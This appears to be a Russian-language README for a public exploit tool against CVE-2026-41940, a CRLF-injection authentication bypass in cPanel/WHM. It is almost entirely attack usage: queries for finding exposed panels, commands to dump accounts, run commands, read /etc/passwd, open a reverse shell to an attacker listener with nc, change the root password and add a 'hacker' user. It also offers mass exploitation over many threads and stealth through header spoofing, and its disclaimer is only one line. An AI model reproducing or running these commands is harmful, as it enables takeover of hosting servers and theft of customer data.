
🚀 CVE-2026-41940 Эксплойт обхода аутентификации cPanel/WHM — лучший сценарий 💥 CRLF-инъекция приводит к обходу аутентификации, угону сессий и утечке аккаунтов. ✅ Прокси, кастомный UA, keep-alive, повторы, проверка SSL, цветной вывод, сохранение в файл. ⚡ Продвинутый PoC для пентестеров.

cPanel & WHM Edition - CRLF-инъекция для обхода аутентификации и полного перехвата сессии
Этот эксплойт использует CVE-2026-41940 — критическую уязвимость обхода аутентификации в cPanel/WHM. Внедряя специально сформированный CRLF-пейлоад в систему управления сессиями, он позволяет перехватывать сессии, получать root-доступ и полный контроль над панелью хостинга без каких-либо действительных учётных данных.
port:2087 "cPanel" "WHM"
port:2083 "cPanel"
⚠️ Отказ от ответственности: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ незаконен.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit
# Install dependencies
pip3 install -r requirements.txt
# Run
python3 exploit.py -t https://example.com:2087
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087
# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt
# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v
# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i
[email protected] $ accounts # List all cPanel accounts
[email protected] $ version # Show cPanel version
[email protected] $ ls /home # List directory
[email protected] $ cat /etc/passwd # Read file
[email protected] $ exec id # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123 # Create new user
[email protected] $ exit # Exit shell
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"
# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php
# Attacker machine (listener)
nc -lvnp 4444
# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"
# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234
# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive # Disable auto keep-alive
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20
# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443
# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080
# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5
# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify
# Docker (if you want to test safely)
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102
# Or with vulnerable version
docker pull cpanel/cpanel:11.102
docker run -d -p 2087:2087 cpanel/cpanel:11.102
Ознакомьтесь с другими моими репозиториями эксплойтов:
| Категория | Возможности |
|---|
| Эксплуатация | ✅ Обход аутентификации через CRLF-инъекцию ✅ Перехват сессии WHM ✅ Утечка токена безопасности ✅ Мгновенный root-доступ |
| Пост-эксплуатация | ✅ Извлечение списка учётных записей (пользователь + домен) ✅ Удалённое выполнение команд (RCE) ✅ Обратная оболочка (совместима с netcat) ✅ Чтение файлов (конфиги, логи и т.д.) ✅ Смена пароля root ✅ Создание нового пользователя cPanel |
| Сканирование | ✅ Эксплуатация одной цели ✅ Массовое сканирование нескольких целей ✅ Многопоточность (настраиваемое количество потоков) ✅ Поддержка переопределения порта |
| Скрытность | ✅ Случайные задержки между запросами ✅ Подмена X-Forwarded-For ✅ Поддержка пользовательского User-Agent ✅ Поддержка прокси (HTTP/HTTPS) |
| Удобство использования | ✅ Интерактивная оболочка WHM (-i)✅ Цветной вывод (colorama) ✅ Подробный/отладочный режим ✅ Экспорт списка учётных записей в файл ✅ Поток поддержания сессии Keep-Alive ✅ Механизм повторных попыток для нестабильных соединений |
| Продукт | Версии | Статус |
|---|
| cPanel & WHM | 11.92 - 11.102 | ✅ Подтверждено |
| cPanel & WHM | 11.104 - 11.110 | ✅ Подтверждено |
| cPanel & WHM | 11.118 - 11.136 | ⚠️ Ограничено |
| cPanel & WHM | < 11.86 | ✅ Вероятно, уязвима |
| Короткий | Длинный | Описание | По умолчанию |
|---|
-t | --target | URL одной цели | Обязательный (одиночный) |
-l | --target-file | Файл со списком целей | Обязательный (массовый) |
-p | --port | Переопределить порт | Автоопределение |
-o | --output | Сохранить список учётных записей в файл | Нет |
-v | --verbose | Включить отладочный вывод | False |
-i | --interactive | Интерактивная оболочка WHM | False |
--proxy | HTTP/HTTPS прокси | Нет | |
-ua | --user-agent | Пользовательский User-Agent | Случайный |
--cmd | Выполнить одну команду | Нет | |
--reverse-shell | Обратная оболочка IP:PORT | Нет | |
--passwd | Сменить пароль root | Нет | |
--adduser | Создать нового пользователя (USER DOMAIN PASS) | Нет | |
--read | Прочитать файл с цели | Нет | |
--threads | Потоки для массового сканирования | 10 | |
--delay | Интервал keep-alive (секунды) | 3.0 | |
--max-retries | Максимум повторных попыток на запрос | 3 | |
--no-keep-alive | Не поддерживать сессию | False | |
--ssl-verify | Проверять SSL-сертификаты | False |